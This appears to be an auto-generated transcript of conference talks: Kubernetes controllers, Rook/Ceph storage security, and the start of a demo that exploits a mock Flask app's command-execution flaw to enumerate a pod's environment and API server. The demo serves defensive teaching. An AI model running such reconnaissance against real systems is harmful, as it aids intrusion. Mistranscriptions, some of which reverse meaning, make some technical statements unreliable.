go-to just because it's also kind of similar to external secrets where it could be quite agnostic or different providers. And it works in a similar way as the NGINX controller where it looks at annotations. So you have an ingress and you add an annotation for external DNS, it will create that record. And yeah, so pretty much it's just annotation based. You add a annotation to your ingress and you'll get DNS and then auto scaling. For this one, I put a vertical pod autoscaler. What it is, it dynamically sets resource and limits on your pod based on your usage. So in case sometimes you spin up a application or service and you're not sure what do I set from a resource consumption, right? Like you can put limits but you truly don't know unless you're kind of just guesstimating. The VPA, what it does, it kind of does that work for you. It looks at trends and it will scale your deployment or pod with those resources and limits based on usage. One thing though, the VPA can be pretty dangerous in my opinion, it uses admission controllers and admission controllers are different type of, it's a controller and what it does, it intercepts communities API request before modifying an object. So VPA, if you create a pod and what it does, admission controllers have one thing called mutating web hooks and validating web hooks. So depending on the application, it can use either one or both. And so if you create a pod and it will intercept it, if it's a mutating web hook, it would modify that request and then apply it to the communities API. One of the reasons why I say it's dangerous is because it's intercepting request. I've had issues where the VPA had issues and the cluster couldn't scale any pods because every request for the pod creation was getting stopped by the controller or by the mutating web hook and the validating one. And so we were like, there was enough resources the nodes were there, but for some reason we would scale the say pod to like 50 and it just, nothing would happen. It would just be context that line. I'm not sure if anyone's seen that before with the play with communities and it's super vague because it could be anything, it could be timeouts, it could be config errors. So we just get constant context deadline errors and then it was the VPA and the mutating web hook that was stopping the create action on the API. So this one has to be careful as well because also the trends, if your traffic is very spiky, like it's very dynamic, there might not be a pattern and it might not give you the best recommendation based on the behavior. And it does come with three components. So the recommender, the updater and admission plugin, the one I recommend is the recommender and this one, it runs on your cluster but it doesn't apply the changes. So what it does, it tracks your trends, it sees your usage but it doesn't apply them. So this is the more safer route because you see what's actually recommending but it's not gonna change your resources. So you can see from there that you can update your deployments with those resource limits that you want rather than having the VP dynamic skills for you which can be pretty risky especially in production. The other one would be certificates. This one, if you have either like an internal, you do self-signing certs or you don't want to pay for certs because there's let's encrypt, you're unfamiliar with it, you can pretty much get free certificates. There is some throttling and so you have to be kind of careful with using it sometimes but you can get certs for free rather than paying a provider for them when it's all totally free. It also makes it easy to renew certs so you don't have to constantly, I'm pretty sure everyone or people that are working production have had a cert expire and it's just one of those things where kind of shake your head and you're like, crap, like not another one, you chat a modern one, it's always one that's missed. Cert manager, what it does, when it's getting close to the expiration time, it would renew it for you and hopefully if you have a learning, you can kind of get a heads up even before that because even if you have to watch cert manager, make sure it's not down or having issues because that's another point of failure. It uses vault, benefit, if you have your own private PKI and of course let's encrypt. So all this is great and it's so many applications but how do you install it? I'll put this more like high level which is because I don't think it's part of the, you want to learn by controllers, not deployment tools. But there's many methods in case you do want to install it. You can use two other ones for packaging your applications as either home or customized. Personally, I like Helm myself. Customize, at least for me, has been difficult to read but I've seen some people do some awesome things with it. And then you have automation tools. You have Argo CD, I'm not sure if you're familiar with it. It uses, which is tricky, it uses Helm templates, not Helm itself. So it actually renders your templates and applies them but you can't do like a Helm LS and CR application or do like a Helm diff and use Helm functions to interact with the Helm deployment because it's not an actual Helm deployment. But Argo CD is awesome because it, at least from my experience, the maintenance has been almost nonexistent. It practically just been running and it gives you a kind of a visual of your applications. So you can see all the resources. You can see the controller, you can see the pods, you can see the staple sets of services. And then we have Spinnaker which is another deployment tool. This one was built by Netflix. It's a pretty much, it's built a bunch of microservices and there's use cases for it and it could make a Helm chart for you. Depending on use case, I found it too cumbersome to install and to maintain just because of different microservices. And then Jenkins, which either you could do simple Jenkins job and deploy an application or even Jenkins, personally I don't have experience with that one but it is an option. And then Terraform, Terraform you can use a Helm provider in case you do wanna stick with Helm. Terraform and Ansible is kind of like a, you're kind of crossing a thin line because in my opinion, Terraform should be infrastructure. It shouldn't be managing your applications but there are use cases for it in case you wanna spin up a, say you have a Terraform module or cluster and you wanna boost up a cluster and you wanna auto install something right when you create a cluster. Like let's say you wanna install external DNS and external secrets automatically. You can use Terraform in the Terraform provider so when you spin up a cluster via Terraform it already has the components there for you. So there's use cases but I would say it's a thin line that I kind of be careful that you're not managing all your applications with Terraform. And then of course with great power comes great tech depth. All this is neat and it's nice but it's a lot of applications, right? You're running this in production and it's open source so there's different release cycles, there's vulnerabilities, there's all different kind of things that you kind of have to stay on top of because you can get very behind. I'm pretty sure like in the past month like just applications had like either five chart releases and yeah, so you have to be conscious of all the different apps that you're installing and also always, it's difficult to kind of keep track of them but I would say it's like a cadence. My preference is every either, every quarter, like you can even follow the community's release cycle and follow, like don't leave it behind because you'll get very behind and then what would happen, in my experience what has also happened is that communities have been deprecating and removing APIs. So if you have an old version of application it might have an old API that it's using. So then you kind of have to update because you have to upgrade your cluster but then you get in this line where now you're like, oh crap, like timbers is behind and now it's like there's a bunch of breaking changes that happen in between those and now you're either dealing with fires or you're not spending more time than if you were just to gradually update every quarter and update your charts every quarter. That would be my recommendation but it's very difficult to keep track of everything. Right now I think I just mentioned 10 applications that would be running and then all those have different cycles. And yeah, so actually I went faster than I thought but I'll leave it open for questions and also wanna put some closing words and this is completely unrelated to everything in this presentation but I just want to kind of say, don't forget the golden rule, treat others so you wanna be treated and in the current environment just being nice to each other, be respectful and help each other. This is the open source community and we're here to learn from each other, help and this is how I started myself. Like I came to conferences, open source conferences and even mentors that helped me out and asking questions, failing fast and just help each other and as you start off this, go on in this conference, talk to each other, network and just help each other. That's it. So with that, do we have some questions? Don't give me a hard one. You have any experience working with Helmphile and can you say anything about that? Which one? Helmphile? No, what is it? I'm curious. It's a wrapper. No, I haven't had the pleasure but I'll look into it to you. I mean, we have plenty of time so I have a quick overview if anyone wants to learn something. Would you mind? Well, it's a wrapper around Helm. Helm. Gotcha. Okay, awesome. Sorry? Who's familiar with Helmphile? I was asking if there was any knowledge of Helmphile which acts as a wrapper around Helm and facilitates automation. Yeah, I may have the chance. I've mainly been using Argo CD and that one you pretty much, depending on how you set up your repo, now there's application sets which makes it a lot more dynamic but it just values file and there's a hierarchy and it just merges them all. That's primarily my use for Helm so far and a little bit to reform but just Argo CD has been my main deployment tool. Okay, we had another question. There was actually one in back there who was in the back. Yep, this is my exercise for the day. Thank you. Great talk today. I'm a total newbie for Kubernetes but can you just confirm that the controller is the beginning of like turning an application into like a LAMP stack application, what you would need? Do you need the controller basically to set up a Apache MySQL or like Nginx MySQL PHP and have them talk to each other? Yeah, so the controller, so there's a lot of controllers in Kubernetes. There's already some that are baked in when you spin up a Kubernetes cluster so like for pods and just the native Kubernetes resources, there's already controllers for them. The ones I specified are kind of extensions of the ones already that are already in Kubernetes. Pretty much the ones that I mentioned, they're more for in case you're ready to make your application external. Like once you say you did your hello world, you have a LAMP stack that you spun up on Kubernetes and now you wanna apply it to, let's say you wanna access it remotely. You have external DNS, I would point to the Ingress if it's external. But yeah, all those would be pretty much just to kind of extend whatever, because you can just install like, I think you can use micro Kubernetes or K3s, I don't express that one, but you can use one of those and you can spin up a LAMP stack just like that. You can just have a deployment file or a pod file resource file and you just add your containers that you wanna spin up and you can just easily spin up a LAMP stack like that. But these would be an extension once you kind of wanna go on a Buffet Beyond. So let's say you've done like Kelsey's high tower, the hard way and you're like, I'm a cuss, fuck, like what do I do now, right? Because you spun up a cluster and what do you do now, right? Like, what can I do more? And these would kind of help you kind of answer that question as to, what can I do now, right? But yeah, in case you wanna chat after, I'm open to Kubernetes. There's a lot of things, even stuff that I mentioned here, there's just open source and there's so many things going on and it's very fast. But if you wanna chat after, I'm really happy to. Over here on, I'm glad you brought up the technical debt because the cadence of changes in a Kubernetes cluster are just crazy. So as far as the people portion of that do, is there one team who's managing all the helm charts for the infrastructure or is it broken up into, like the networking team is dealing with the Ingress Controller and the security team is dealing with secrets controllers and things like that. It just seems hard to manage and you have to. Yeah, so it really depends on, and you're referring to like, let's say a company or where I work, right? Like, so it varies by my team, to be honest. Some teams or the company, they might have the bandwidth or the money to pay for an infrastructure team that can manage this. For us at Blizzard specifically, we're a team of, at least for the game teams, we're a, let's say 30 SREs and we're split up in different game teams. And we're kind of siloed in that way where like me and two other people, we maintain our Kubernetes infrastructure. So we maintain all these charts and we have our own workflow for Kubernetes. We have our, of course we share, we kind of try to not do things twice or doing the same way or do double the work and we try to share everything and try to be agnostic in the way we create modules or stuff to share. But yeah, at least from our side, we maintain our own infrastructure and that's why we try to be on top of these things because we've already been bit by this multiple times and it's a massive undertaking of maintaining our cluster just because there's so many components that are just constantly changing. Even the Kubernetes versions, they, I think they reduced it from four to three, I think every year just because they were releasing versions every cycle and it was getting too much, it was too much for people, I think. Okay, we had, yeah, thank you for the talk. You just slightly touched the question how controllers and operators are related and do I get it right that they're kind of similar thing or can you give some more insights on that? Thank you. Can you repeat the question? I missed the first part. What's the relation between operators and controllers in Kubernetes? So an operator is more domain specific so you have like, it could be application based so you could have like a vault operator that just looks at vault resources and the vault operator might have like custom resources called like CRDs and it would look at those for like events in the API or changes and it applies, dependent operator applies resources based on that changes to the resource. The controller would be kind of like the, that are native to communities so like the job controller would be one. I think it's called Pod Controller, I'm not sure if I might get the name wrong on that one but they're all native to Kubernetes resources and they're already like baked into Kubernetes. Operators are just either someone built it for their specific application and their custom resources. Don't a lot of operators contain a custom controller though? So they have to, actually you stump me on that one because they do a track with the different controllers depending on what events you're watching but yeah, I'm not gonna have to ask that question, I'm stumped, I'll probably follow up with you and give you a better answer, yeah, sorry. Yeah, usually controllers are just like, looking at the world and iterating and an operator is a controller coupled with CRDs that have custom resources that it's operating on and so like the controller pattern came first, it existed for a long time and then they just kind of named this pattern afterwards called the operators where you create your own custom resource and then you modify objects based on CRDs. There you go, smarter guy than me right there, answered it, thank you. Okay. So I've got a quick question on Argo CD for rollback or canary deployments. That would be an awesome tool. So my question is for rollback, what would trigger a rollback on a canary deployment? Would it be a crash loop event or would it be a health check endpoint on a deployment? So it depends, Argo CD just does like the native like deployments, so depending on the deployment how you have it set up, depending on the health checks you're checking and what's the other one? The amount of paths that are unavailable but there's a thing called Argo rollouts which is an extension of Argo CD it's maintained by the same I think Intuit the company that built Argo CD. There's a, they have another company called Argo rollouts which has those blue green deployments canary and those have certain conditions you can set. So let's say you have a percentage or something for deployment, rollouts will look at that depending on what thresholds you set and it will rollback depending on the threshold you set. Any more questions? Have maybe it's more like a comment or a question to the audience. Since you haven't noticed this scaffold within this automated deployment and maintaining things. So I wonder if anyone has any experience running scaffold for like production environment? You mean scaffold with a K the cloud native project, yeah? Okay. I think it varies by, you know, just like the company or whatever you're trying to do. I think everyone might have templates and stuff but production ready is a very, it's a loaded term I would say, maybe someone has a better answer but there could be many different ways you can do something and set different templates. Not sure if there's anything open source that kind of has something that would be production ready. Yeah, I don't think I have a better answer for that one. Sorry. Okay, one more here. Scaffold is a great tool for development but it's also a CLI. So if you're using scaffold in production that feels like a single point of failure. If ever that CLI stopped or if ever the box that was running that CLI was reset then your deployments would stop. I think I would rather some cloud native something that was continuously monitoring that did the thing. So would I wrap scaffold in GitHub actions or you know, something like that? I think I'm starting to over engineer it. Other questions? comments? Okay. Awesome. Well thank you very much, Jim. Thank you everybody for attending lunch time. And we will be back at one PM with the Sephrook storage team talking about how you secure your cloud native storage. Two, test. One, two. One, two. Test. Okay. Hello everyone. Please come in, take a seat. We're gonna get ready in just a few minutes here to talk about data security using Rook and Seph. But yeah, please have a seat. Oh yeah, also I'm totally smiling behind my mask and you all can't see that. I'm trying to look welcoming. So instead I'll be awkward on the mic. All right, welcome back to the cloud native track. I hope you had a wonderful lunch. And we are ready to kick off the afternoon with data storage security using Rook and Seph with Anna McTaggard and Federico whose name, my first last name is... It's a hard one. Say it again for us. Lucifred. Lucifredi. Please welcome them and take it away. Thank you. So nice to see you all after two years. Now my marketing manager would not forgive me if I gave up on introducing myself point. So here is the short version. I had the privilege of spending my entire career in open source software. I'm the product management director for the Seph platform at Red Hat. Before that I was the Ubuntu server at Canonical. If you know that was my favorite. And if you go back to decade, I was the dreaded systems management czar at SUSE. Here's a list of a few things that I worked on. Slas is a SUSE Linux enterprise server, but that's what we call it. I was the maintainer of MAN for about 10 years. That's the MAN one there at the bottom. And shameless plug, I have a book on AWS operations out by O'Reilly and that's why you see me all surrounded by clouds there. And I'm joined by Anna. Hey, I'm Anna McTaggart. I'm newer at Red Hat, but I work on cybersecurity here. And I did my undergrad at UMass Amherst graduate school at UC Santa Cruz. I went from sort of an academic background in deniable file systems, moved to oblivious computing, to formal methods, to incident response at Red Hat. And I also work on a formal methods community of practice at Red Hat and also SAP security. And in my free time, I like to hike with my dog and garden a lot and work towards a more inclusive world. Righty, so if you're here, you probably already know what SAP is, but the 62nd version is that SAP is the dominant software defined storage solution in open source. We work on SAP like to think it as the future of storage and we're quite proud of the community that we built around the project and its technical prowess. SAP is highly scalable or horizontally scalable, highly available, highly resilient, capable of serving file, block, object. And that's why there is more than three exabytes of SAP out there. Many other things can be said about SAP. It's the bee's knees, is the short version. But you are here, so hopefully you already know that. If you don't, go to see Mike at the SAP booth this afternoon and he will give you a proper education. But for now, think of it as the Linux kernel of storage, if you're not familiar. Less famous, but equally awesome, Rook is the CNCF project that fronts storage and it's basically a SAP operator. Rook helps reduce the operational burden a storage team faces by delivering cloud native storage for Kubernetes. Creating horizontally scaled and self-healing clusters in SAP is complemented by Rook making them increasingly self-managing and even self-scaling if you want to look at it that way. Rook enables SAP to deploy on Kubernetes with ease, enabling all the benefits of container orchestration on what is now the dominant private cloud platform. Storage running on top of the compute infrastructure like any other infrastructure would or an alternative storage running on bare metal as an external entity for petabyte scale storage delivery to many Kubernetes clouds. Rook is the storage operator, so now the stage is set for security of these two fellows. Now, security practices harden a specific point of the infrastructure, cherry picking practices without the model of the threat and the attacker is not a viable strategy. The joke usually goes, if you want to protect from all possible threats, you need to turn the computer off, bury it in concrete and drop it at the bottom of the ocean. In other words, absolute security is not usable and probably not even possible, but that's secondary. It's just not a useful thing. You have to have a model of what you're protecting against. So, you're defining your security in the context of a threat model. Are you facing script kiddies or the GRU or the dreaded privilege, the insider, that we should all be worrying about? These are very different scenarios and the things that you do are significantly different. Some of these want to steal your data, others want to crypto lock your data and hold you for ransom, others yet may be satisfied by causing disruption, deleting a few files or causing a transient denial of service. So, with that in mind, let's dive right in on what things you can harden specifically. Let's look at network security with Seth and Rook. Let's dive right in. The public security zone is an entirely untrusted area of the cloud. It could be the internet as a whole or just networks external to your cluster that you have no authority over. Data transmissions crossing this zone should make use of encryption. And note that the public zone, as I just defined it, does not include the storage cluster front end, the Seth public underscore network, which defines the storage front end and properly belongs in the storage access zone. The Seth client zone refers to networks accessing Seth clients like the object gateway, the Seth file system or block storage. Seth clients are not always excluded from the public security zone. For instance, it's possible to expose the object gateways as three or Swift API in the public security zone. Next, the storage access zone is instead an internal network providing Seth clients with access to the storage cluster itself. So the cluster zone refers to the most internal network and provides storage nodes with connectivity for replication, heartbeat, backfill, and recovery tasks. This zone includes the Seth cluster's backend network called the cluster underscore network in Seth. And operators often run clear text traffic in the cluster zone relying on the physical separation or VLAN separation of the network from any other traffic. This, for example, would not be a valid choice if your threat model includes adversarial privileged insiders, going back to what we were just saying. And these four zones are separately mapped or combined depending on the use case and threat model in use. There is another network that is common, but usually, but not properly part of Seth itself, which is what you could think of as a management network. It's nice to have a separate network that cannot be flooded by user events or service events for things like SSH, monitoring, maintenance, Pixie. So that is not one of the Seth networks, but most Seth users or many Seth users choose to have it physically separate for insurance reasons for special situations. So with that model, components spanning the boundary of two security zones with different trust or authentication requirements must be carefully configured. These are natural weak points in network architecture and should always be configured to meet the requirements of the higher level of trust between the zones that are being connected. In many cases, the security controls should be a primary concern due to the likelihood of attack at this point. Operators should consider exceeding zone requirements at integration points, which for a storage product is actually often easier to accomplish than in the general case. Your storage system may be able to serve any kind of storage, but in your specific enterprise or agency, you may be using it just for one type of storage, like object only. And that gives you a much smaller envelope that you can use to narrow down what you're allowing people to use. For example, the cluster security zone can be isolated from other zones easily because there is no reason for it to connect to the other zones. Conversely, an object gateway in the client security zone will need to access a lot of things. The monitors on ports 6789, the OSDs on ports 6800 to 7300, depending on how many you have, and will likely expose to the world its S3 API to the public security zone on port 80 and 443. So different SEF demons have different characteristics and you have to leverage them accordingly. Now let's move from network to encryption. Server side, Red Hat customers overwhelmingly choose to encrypt data at rest. That's, I stopped tracking this in 2016. At that point, more than 60% of our customers were using at rest encryption, and it was rapidly going up. It's basically a default. And the mechanism that they used to encrypt the data at rest is the Linux Unified Key Setup Mechanism, better known to all of us as LUX. All data and metadata of a SEF storage cluster can be secured using a variety of DM crypt configurations. And the security best practice here is to locate monitored demons on separate hosts from the storage demons. So the mons on separate hosts from the OSDs. And we do this because the mons keep the DM crypt keys. So if someone walks away with one hard drive, they don't have the keys because they're on the mon. But if somebody walks out with a box because the box has either an OSD or a mon but not both, they cannot decrypt the data. They don't have the keys for that. Ensuring anti-affinity of the keys and the data they encrypt, this results in physical removal of a host, not including its decryption keys. The Object Store Gateway has additional capabilities, including at encryption, at ingestion. The use of per user keys as opposed to per drive keys. There are rotation using tools like Vault and soon SFADM. Support for Amazon AWS, SSE, KMS, and more. Department of Defense certified ciphers under the FIPS 140-2 standard can be used if they are supplied by the operating system. So you can get those on RHEL or on certain versions of Ubuntu. Here, the thing that's interesting to compare is you can encrypt the disks with the encrypt and have at rest data encrypted just because it's on the drive. In that model, you have operator-managed keys. The operator is managing all keys for you. You, as the user, are not doing anything with the keys. The alternative is that you use at ingestion time encryption. So RGW can encrypt when the data is ingested or the crypto and retrieved by providing a user key at runtime. So if you're doing this, the keys are user-managed. The responsibility is all on the user. But there is also a slightly different thing in that the encrypt, once the drive is open, it's available to the system. And, OK, you have to be rude to access that drive. But in a sense, you can access that data. Well, in the RGW ingestion model, the key is only there while writing the data or retrieving the data, and then it's gone. So the exposure time of the data is also significantly smaller. So lots of trade-offs to play with as you build your model. Network communication can be secured by turning off SAF protocol encryption in the Messenger 2.1 protocol introduced with Nautilus, which is a recent release. Here, clear text on the network front. I told you that almost all of our customers encrypt data at rest. On the network front, the practice is that customers encrypt the data as it goes out of the cluster to their application. Depending on what the application is, block or object, they encrypt it accordingly in different ways. But the internal SAF traffic is overwhelmingly in clear text. With Nautilus, the option to encrypt the internal network traffic became available. This is relevant in two ways. One is because there are parts of the SAF system where the SAF protocol is in use to the client, like CFFS. In that case, the only way you could secure that connection is by encrypting the SAF protocol, so you need that support. The other part where it's relevant is that a significant number of customers asked for this, and I wasn't quite clear why, because it seemed like a silly thing to say I'm going to encrypt all the traffic that's going on a network that nobody can touch. So after a couple of customers came with this, I said, well, do you have a Snowden problem? Do you have a privileged insider problem? Is that what you're trying to protect against? And they said, yes, we have a requirement to protect against privileged insiders. Now this was a customer discussion, so you cannot tell a customer that they are wrong, but it's extremely difficult to protect against a privileged insider. You could argue that it's impossible if someone is sufficiently privileged. So in this scenario, it seemed like a weird thing to say. Then after a while, I built a different pattern, which is all of these customers were coming from the same country, and they had a regulatory requirement that that country's telco agency had created to make NSA eavesdropping on their citizens harder by basically encrypting all links no matter what or where. So that finally explained why this was happening. But this is still useful functionality. In most cases that are not regulatory driven, this can still be helpful, because let's say that you're a large enterprise and that you have a policy that everything must be encrypted no matter what. You can go and argue with the security team that they don't encrypt the backplane of a NetApp appliance, and so they shouldn't encrypt the private network of SEF and go back and forth until they give you permission. Or you could buy a few more Intel CPUs and not have that discussion. So it's a very good way to bypass certain authorizations and why not? It's going to make you more secure. And since the overhead of encryption can be generally shadowed by the latency of the fact that this is a network storage system, so you add a little bit more CPU to come up with what's needed to support the encryption pass itself, the performance of the cluster for most use cases can be the same to the application. So it's a very valid option in that sense, and we won't judge what your reasons are. Looking at more specific protocols, S3 service is usually secured between RGW and S3 client with TLS, obviously, on port 443. Also, RGW very often serves clear on port 80 because you could use RGW as a web server and not all web server use cases are necessarily encrypted. TLS termination at HA proxy in front of RGW is a special case, so you'll have to decide what's happening in the link that goes between HA proxy and RGW. Does that need to be encrypted or not on your network? If it's in the clear, it should be in the right security zone. Obviously, I'm not going into standard network practices like firewalling individual nodes to only expose the clear list of ports and stuff like that. But standard network hygiene applies. And now I'm going to hand over to Anna. Hey, so now we're going to talk about specifics for Rook. So Rook can use custom resource definitions to encode a lot of security preferences and settings. For example, we can configure trust certificates for Rados gateways web server. Rook also supports at rest data encryption like we discussed earlier. We recently allowed in-flight stuff protocol encryption in 1.9. This allows us to implement a lot more secure features and just generally get better security. We can do that also to segregate our traffic using the software-defined cloud network fabric. And in addition, Kubernetes user permission system applies to all the persistent volumes. So our permissions, quotas, everything like that that comes from Kubernetes applies. Nothing Rook needs to do here. Rook also supports a key management system in the container storage interface driver which allows individual volumes to be encrypted with their own key. This limits the scope per key, which is a really important security practice. All of this ensures that we can follow best practices easily. We can follow key rotation, revocation, and limiting the scope from each key. This also limits the scope of our unencrypted traffic, which is really important. Now let's talk about the control plan for Rook. As popularized by Ansible, SSH is used by Seth Admin, Seth Ansible, another deployment in day one tools to provide a secure command path for install and upgrade operations as part of host management. This is important so that we are limiting the people that can have access, but still enabling us to get access to host management. The dashboard shouldn't be exposed to the world, but it needs to be reachable by the operator's workstation to be of use. You can't just say no one can access the host management system and then expect us to use it. It has to be accessible somehow. So we're doing this via SSH. And this is done via the support specified. It really limits access and locks it down. We also can have our dashboard access zone be tailored by our operator to suit our local threat model. Again, you probably don't want it to be exposed to the world, but it needs to be accessible to some people. You can have SAML authorization, Kubernetes native authorization, lots of options there. The Seth manager is also accessible via SSH. Now let's talk a little bit more about identity and access for Seth. Seth uses shared secret keys. It protects clusters from in the middle attacks by default. Now you still need to have some good practices. One good practice here is to grant key ring, read, and write permissions only for the current user and route. Client admin user being restricted to route only. You don't want all users to be route. That would not be very secure. But you want to make sure that somebody has route so your client admin user can be restricted to route only. And then talking about RGW, it also supports the key and secret model of AWS S3 and the equivalent model for OpenStack Swift. So those are some more authentication models that you can use. With S3, we also have the bucket policy as an option, which can enable you to basically apply bucket permissions like an S3 bucket accordingly. Now, of course, your administrator key and secret, regardless of if it's S3, native, whatever, Swift, you have to treat it with appropriate respect. You really want to use your administrative users sparingly, which we're able to do in Rook, like I just said. With RGW, the user's data is also stored in stuff pools. And again, we have great ways to secure this, Federico said. So you can store them securely with your data at rest. You can couple with OIDC providers such as Key Cloak, back with your organization's identity provider. This can really give you a granular role or access attributes really granularly and make sure that it's locked down as much as possible. Really limiting your scope of access. We also support LDAP, Active Directory, Keystone Identity Vaults. These are all supported in Rook with Ceph. And again, auditing is a really important part of security. This is an example of a Ceph audit log. You want to check your operator actions against a cluster. They're being logged. You want to periodically remove them, of course, so that somebody can't just access your log and then see everything that you've ever done. We aggregate these to our log. You might want to aggregate these to your log management system as appropriate. But again, you probably want to delete them at some point. So let's talk data retention. So for example, with Rados, your users generally don't have the ability to read, write, delete objects directly in a storage pool. You can apply a bucket object lock, so all objects in a bucket have the same security requirement. You might even want to have multi-factor authentication requirements to remove an object from one of these buckets. It's a little bit different on a Ceph block device, object gateway, or file system. Your user can create, delete, modify, volume images, objects, and files. But again, with Rados, it's a little bit more locked down. When we delete data from a Ceph cluster, though, whether we be a user or an admin, it generally can't be recovered for practical use. There's a couple exceptions. RBD supports trash bin dynamics with spare pool capacity. This can also have issues with versioning of object store buckets resulting in deleted objects being preserved until deleted by policy or the administrator. But again, generally speaking, once we delete something, it's not accessible. So if you delete your log, nobody can find it, which is great from a security point of view, because nobody can dig through your deleted data. Now, if you want your user data retention to be one of your concerns, you might want to configure your storage pools accordingly. And then additionally, you might want to be aware individual data blocks, they are present on persistent storage until overwritten. So that is a risk with deleted data. But again, it's generally not accessible. Now, if you're actually retiring your media and you don't want somebody digging through your dumpster to go through and find all your data, you might want to encrypt it at rest and then discard the key. Nobody's going to be decrypting it. That would require pretty intense resources that are probably unlikely. So if you do that when you replace an OSD, just encrypt it and delete it. Or if you don't trust your cloud storage provider to properly clear the disk. So again, these are some options that you can use. We also have infrastructure hardening as some options. These are highly vendor dependent. So we're going to talk about what Red Hat does. Your self-distribution might vary. At Red Hat, we ship with SE Linux on by default in enforcing mode. This is important. It enables greater security and it doesn't require anybody to configure it by default. We can also make use of FIPS 140-2 certified ciphers as supplied by REL. For example, REL 8.2 is our most recent certified version. We regularly certify these. In addition, we also harden certain binaries. Red Hat's self-storage binaries has these options that are listed here, such as Fortrify Source, your F-stack collision protection, all of these options. You want to consult with your vendor to see what is being done to harden your binaries just to make sure that they're consistently secure. These represent the intersection points of the network security zones as we've discussed. In addition, at Red Hat, we run covariate pretty regularly. We run those scans. We look through those scans. We see what's going on there. We also regularly ship fixes for any reported CVE or exploit, working with our incident response team to make sure that nothing is left to be insecure. Now, there's always a risk, but these hardening options really do increase the security. Again, their vendors are specific, but this is what we're doing at Red Hat. And you can apply all of these accordingly. So thank you so much. And turn it back to Federica for any questions. We have a couple of bookmarks for you that we haven't written the paths because they're super long, but you'll get the slides in the next few days, so you can just click on them. These are some interesting resources for pretty much everything that we've discussed to dig down in things like compile time, hardening, which we don't really have the time to go into. At this point, if there's any questions in the audience, yeah. I wanted to ask, you said you delete your logs. Do you overwrite where the logs were or do you encrypt the logs and then delete them? Is that what you're doing as a standard? It all depends on your configuration, I believe. Yeah, you would have to choose how to do it. But a normal practice would be that you don't store the logs or the monitoring data on the system that you're monitoring. So you're not deleting the logs out of SEF, you're deleting the logs out of a Linux file system, so you can use usual sanitizing practices there. If you're not in some very high debug mode, the logs should be pretty clean in terms of not containing anything confidential. But like Anna said, if you're just going to keep a history of everything that happened in the cluster, that potentially is a leak, so you want to purge them at some point eventually. Do you do this automatically with Rook? Didn't, the log management is not automatic. That's why aggregating logs is a good best practice, because once you have them in Splunk or whatever other tool, RSS log, whatever tool you use to aggregate the logs, it's much easier for you to manage them in a central point. Thank you, any other questions? Don't be shy, we got lots of time. All right, well thank you everyone, and thank you especially to Federico and Anna. Thank you. Super important how to keep your stuff safe, and the next session will be on a different angle on safety, basically how to prevent people from hacking into your Kubernetes cluster. Should be exciting. Please join us at two for that. Thanks again. Testing one, two? Sounds like you can hear me. Oh, and welcome to the two o'clock session of the Cloud Native Track here at Scale. I am super pleased to introduce Eric Smolling, who is going to have a few exciting demos about how to break into Kubernetes clusters that are perhaps not as well configured as they should be. So I am very much looking forward to it. Please give him a hand and send a prayer to the demo gods on his behalf. Thank you. Eric, take it away. Thank you, thank you everybody for coming. Good, my slides are up, good, we're good to go. So as she said, I'm Eric Smolling, I'm a senior developer advocate at Sneak, but I'm not really going to be talking about Sneak, so don't worry, not a vendor pitch. We're going to talk today about hacking Kubernetes. So you can get a feel for where I come from, you can read that if you want. I'm a developer background. I'm not an operational background. A lot of Kubernetes folks come from SysOps and learn development. I kind of came the other way. I have about, depending on how you look at it, 30 years of software dev experience and dev ops experience or whatever. Doc or captain have the CKS and all that good stuff. Been using Docker though since early days, like 2013. And I have a tweet of Solomon mocking me publicly that old so you can go check it and check my, if I'm telling the truth. If you care, I'm Eric Smolling all over the socials. But what we're going to talk about today, and forgive me if I keep touching this, this is my notes and I'll be doing things with it, so sorry I had to have that in front of me, but you know how it is. But we're going to be talking today about how the combination of app vulnerabilities and misconfigurations can allow an attacker to spread the blast radius of their attack. And of course we're going to be talking about this in the context of Kubernetes, because that's what every talk today almost is. That pattern of exploits to expansion is kind of how most of these attacks come about. An application vulnerability gives an attacker the initial foothold. And then infrastructure level misconfigurations can allow that attacker to spread into other parts of your system. So we're going to walk through an app vulnerability to from going from an app vulnerability to basically owning a cluster. Now this of course is, we only have 45-ish minutes. This isn't going to be a full on huge demonstration. It's going to be fairly contrived on rails so you can kind of follow along. But what I'd like you to see is what are some of the things that if you stand up a Kubernetes cluster, if you don't think about, if you don't customize, you don't configure, how they can bite you and what you can do to head those things off. So, setting the scene. We're going to pretend that we are a hacker and we have found this vulnerable server out on the internet. We don't know much else about it other than that it has this particular vulnerability. For the purpose of this demonstration, this is just a mock flask app that we wrote that has a remote command execution vulnerability. What that means is it's going to allow me to run commands directly on the server where that web app's running. It's a simple flask app, honestly. But these kind of vulnerabilities do exist in the wild. Things sort of, software like Tomcat or gosh, Spring Boot or basically anything in Java if you were running log4j last year. You can craft, a hacker can pass malformed or specifically crafted requests by HTTP or whatever that allows them to run commands on that server. So, while we go through this, I'm going to have this timeline of Doom that's going to show us as we go along from the left where we have found a vulnerable container in this case. And as we go to the right, we'll see the things that lead up to escalated exploit. So, enough of slides. Let me get over to the wonderful hackable app. So, of course, this is very, again, contrived. Understand that this could very well be any RCE you've seen out there if you have seen them. But this is going to be, I've done this so that it's easy to see it from the point of view of the audience out there. So, the way this RCE works is we have found that if we pass a CMD into this web admin context, you can pass a string into it and it's going to run it. It's pretty bad. So, I just ran who am I on, this technically is running over here on this machine. And because I'm not brave enough to test the demo guides that much, I'm running kind on Docker desktop just on that machine. I'm using this machine so that you can see that, A, first of all, because it's an Intel machine and I have some images that aren't cross architecture, this M1 machine has problems with that. But B, so that you can say I don't have Docker running over here, Docker engine. I don't have anything running here what you're going to be looking at. So, it's all remotely connecting over there. So, what I've hit is the front end of that. I just passed a command in. One of the most interesting commands I might do as a hacker is I want to see what I can get out of your environmental variables. And here, is that big enough for you to need me to grow that? Oh, is it cut? Okay. Yeah, let me drag this. Better, better. Cool. So, here's all the environmental variables that are in the environment of that Flask app that you can see. And there's a ton of Kubernetes ones. So, that's, aha, I'm running in a container, I'm on Kubernetes. I can also see other things about it. But one of the interesting ones that you can see from this point of view is this Kubernetes service host. There's another one here, actually, that I usually look for. Kubernetes port's right up top. So, this internal 10.IP address, that is the API server from the point of view of this pod. That is the control plan. If you're not a Kubernetes expert, that is where you send commands to Kubernetes to do things, it's the API endpoint. So, what else can we find out? Let me copy this. And I'd kind of like to know what is the IP address where I am. So, I just did an IP space A and it looks like I'm at 10, 244, 162, 135, inside that cluster. This is the pod's IP address. Interesting to know. What else can I find out? Let me open another one of these and actually I'm gonna copy for my notes over here because it's easier than typing. This is what happens when a presenter gets off script. I 